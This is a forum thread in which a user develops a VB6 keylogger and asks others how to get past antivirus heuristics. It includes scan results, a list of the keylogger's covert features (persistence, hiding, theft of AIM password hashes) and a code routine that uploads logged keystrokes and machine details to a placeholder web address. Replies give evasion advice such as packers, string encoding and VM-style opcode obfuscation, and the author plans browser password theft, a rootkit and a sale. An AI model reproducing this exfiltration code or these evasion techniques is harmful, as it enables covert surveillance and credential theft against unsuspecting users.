Bypassing Heuristic AV scans

[312c]

So I'm working on a project and trying to get it as invisible as possible to AV's. On first run it got picked up by 12, managed to get it down to this. I understand why 4/5 are seeing it, but I don't understand what "Dropped:Generic.Malware.SL!.CB5471F7" the dropped part of this is.

Code:

File Project1.exe received on 03.31.2008 20:28:54 (CET)
Antivirus	Version		Last Update	Result
AhnLab-V3	2008.4.1.0	2008.03.31	-
AntiVir		7.6.0.78	2008.03.31	HEUR/Malware
Authentium	4.93.8		2008.03.30	-
Avast		4.7.1098.0	2008.03.30	-
AVG		7.5.0.516	2008.03.31	-
BitDefender	7.2		2008.03.31	Dropped:Generic.Malware.SL!.CB5471F7
CAT-QuickHeal	9.50		2008.03.31	-
ClamAV		0.92.1		2008.03.31	-
DrWeb		4.44.0.09170	2008.03.31	-
eSafe		7.0.15.0	2008.03.31	-
eTrust-Vet	31.3.5658	2008.03.31	-
Ewido		4.0		2008.03.31	-
F-Secure	6.70.13260.0	2008.03.31	-
FileAdvisor	1		2008.03.31	-
Fortinet	3.14.0.0	2008.03.31	-
Ikarus		T3.1.1.20	2008.03.31	-
Kaspersky	7.0.0.125	2008.03.31	-
McAfee		5263		2008.03.31	-
Microsoft	1.3301		2008.03.31	-
NOD32v2		2987		2008.03.31	probably unknown NewHeur_PE virus
Norman		5.80.02		2008.03.31	-
Panda		9.0.0.4		2008.03.31	Suspicious file
Prevx1		V2		2008.03.31	-
Rising		20.38.01.00	2008.03.31	-
Sophos		4.28.0		2008.03.31	-
Sunbelt		3.0.978.0	2008.03.18	-
Symantec	10		2008.03.31	-
TheHacker	6.2.92.259	2008.03.30	-
VBA32		3.12.6.3	2008.03.25	-
VirusBuster	4.3.26:9	2008.03.31	-
Webwasher-Gate	6.6.2		2008.03.31	Heuristic.Malware
Additional information
File size: 36864 bytes
MD5: 020a8fb298a12bc44757c1929726ad3e
SHA1: ae5de0c19b48b1deddabb34ae4bbff2f70082889
PEiD: -

[312c]

Well got down to this just by encoding all the strings inside the program with base64 and then decoding them inside the program.

Panda 9.0.0.4 2008.03.31 Suspicious file
NOD32v2 2987 2008.03.31 probably unknown NewHeur_PE virus

[Krazy]

hmmm

calling versh itt

[cit1]

NOD32 ftw

[mhu]

very interesting

I will enjoy seeing this pan out

[Epotn]

whats it do?

[312c]

Still only detected as:
Panda 9.0.0.4 2008.03.31 Suspicious file
NOD32v2 2987 2008.03.31 probably unknown NewHeur_PE virus

and what it is a keylogger in vb6 (bleh).

Does the following:
-records keystrokes (duh)
-records the window/time
-moves itself to a system folder
-injects itself into startup
-hides from application list in task manager
-unseen by user
-uploads logs to a website
-steals aim password hashes

What it doesn't do yet:
-be invisible under the process list in task manager

NOTE: this is my first ever program in vb6

I'm having a problem though with it not ending ieexplorer.exe when it closes

[312c]

Code:

Private Sub upload()
    Dim ie
    Set ie = CreateObject("InternetExplorer.Application")

    Dim szUser As String
    Dim vers As String
    szUser = Space(255)
    vers = Space(255)
    Dim lReturn, comp As Long
    lReturn = GetUserNameA(szUser, 255)
    comp = GetComputerNameA(vers, 1024)
    vers = Trim(Left$(vers, InStr(1, vers, Chr$(0)) - 1))
    szUser = Trim(Left$(szUser, InStr(1, szUser, Chr$(0)) - 1))
     
Dim site As String

site = "http://<SITENAME>/log.php?pw=PASSWORD&v="
site = site + vers + "~" + szUser
site = site + "&log=" & Replace$(Replace$(Text1.Text, "+", "&#37;2B"), "=", "%3D")
ie.navigate2 site
Do
DoEvents
Loop While ie.Busy = True

ie.Quit
Set ie = Nothing

Text1.Text = ""
End Sub

Every time I run this it says "method navigate of object iwebbrowser2 failed" on the line 'ie.navigate2 site'. Any suggestions?

[w00b]

So I'm working on a project and trying to get it as invisible as possible to AV's. On first run it got picked up by 12, managed to get it down to this. I understand why 4/5 are seeing it, but I don't understand what "Dropped:Generic.Malware.SL!.CB5471F7" the dropped part of this is.

Code:

File Project1.exe received on 03.31.2008 20:28:54 (CET)
Antivirus	Version		Last Update	Result
AhnLab-V3	2008.4.1.0	2008.03.31	-
AntiVir		7.6.0.78	2008.03.31	HEUR/Malware
Authentium	4.93.8		2008.03.30	-
Avast		4.7.1098.0	2008.03.30	-
AVG		7.5.0.516	2008.03.31	-
BitDefender	7.2		2008.03.31	Dropped:Generic.Malware.SL!.CB5471F7
CAT-QuickHeal	9.50		2008.03.31	-
ClamAV		0.92.1		2008.03.31	-
DrWeb		4.44.0.09170	2008.03.31	-
eSafe		7.0.15.0	2008.03.31	-
eTrust-Vet	31.3.5658	2008.03.31	-
Ewido		4.0		2008.03.31	-
F-Secure	6.70.13260.0	2008.03.31	-
FileAdvisor	1		2008.03.31	-
Fortinet	3.14.0.0	2008.03.31	-
Ikarus		T3.1.1.20	2008.03.31	-
Kaspersky	7.0.0.125	2008.03.31	-
McAfee		5263		2008.03.31	-
Microsoft	1.3301		2008.03.31	-
NOD32v2		2987		2008.03.31	probably unknown NewHeur_PE virus
Norman		5.80.02		2008.03.31	-
Panda		9.0.0.4		2008.03.31	Suspicious file
Prevx1		V2		2008.03.31	-
Rising		20.38.01.00	2008.03.31	-
Sophos		4.28.0		2008.03.31	-
Sunbelt		3.0.978.0	2008.03.18	-
Symantec	10		2008.03.31	-
TheHacker	6.2.92.259	2008.03.30	-
VBA32		3.12.6.3	2008.03.25	-
VirusBuster	4.3.26:9	2008.03.31	-
Webwasher-Gate	6.6.2		2008.03.31	Heuristic.Malware
Additional information
File size: 36864 bytes
MD5: 020a8fb298a12bc44757c1929726ad3e
SHA1: ae5de0c19b48b1deddabb34ae4bbff2f70082889
PEiD: -

a dropper is a program that either a) copies itself to the root filesystem directory [aka C:\windows\xxxx] or drops a file onto a website, the point is a file is being dropped somewhere. Your best bet is to use some very small and little known packer to pack your application. It's not detecting your strings, it's detecting your method, so to get around this requires changing your method up. I can see you're just doing it in VB so packing would be your best option. When i write programs in C, i code a small virtual machine and encode the 'bad' methods with their own opcodes, and have them decode themself on the fly, so heuristics won't even know what they are looking at, except maybe NOD32. hope this helps, holla @ google for more infos. pz!

edit: after looking at the source.. if that is the whole thing, i'm guessing the heuristics know that computer information is being retrieved and then 'dropped' on a website.

[sn1per]

Just shooting in the dark here but I would replace

http://<SITENAME>/log.php?pw=PASSWORD&v="

With something more inconspicuous. trout.php?lake=FISH&

[312c]

edit: after looking at the source.. if that is the whole thing, i'm guessing the heuristics know that computer information is being retrieved and then 'dropped' on a website.

Thats just a little bit of the full code, and it was being picked up as a dropper before I even added that bit into it.

Just shooting in the dark here but I would replace

http://<SITENAME>/log.php?pw=PASSWORD&v="

With something more inconspicuous. trout.php?lake=FISH&

True, but I'm just trying to get it fully functional at the minute.

[plex]

i need to buy something like this
holla

[312c]

i need to buy something like this
holla

I'll let ya know once its finished.

I fixed the issue I was having, the aim hashes weren't being URL encoded correctly.

I'm also working on switching it to using POST and I'm adding in stealing firefox/ie/outlook/thunderbird passwords. Also attempting to add rootkit abilities to it so that it is 100% invisible to the user.

[sn1per]

It would be nice if you posted this up like you did your cracker

[Epotn]

What it doesn't do yet:
-be invisible under the process list in task manager

there was like this mini tutorial on neworder that was making a keylogger in vb and i was curious to see how some people tried to get it invisible to the process manager and from what i could tell its not to hard just have to go through google searches

[312c]

there was like this mini tutorial on neworder that was making a keylogger in vb and i was curious to see how some people tried to get it invisible to the process manager and from what i could tell its not to hard just have to go through google searches

yeah I found a kernel level driver that does that when tied into the program, just modifying it to not be detected now.

[Audio]

this came up in a search so i bumped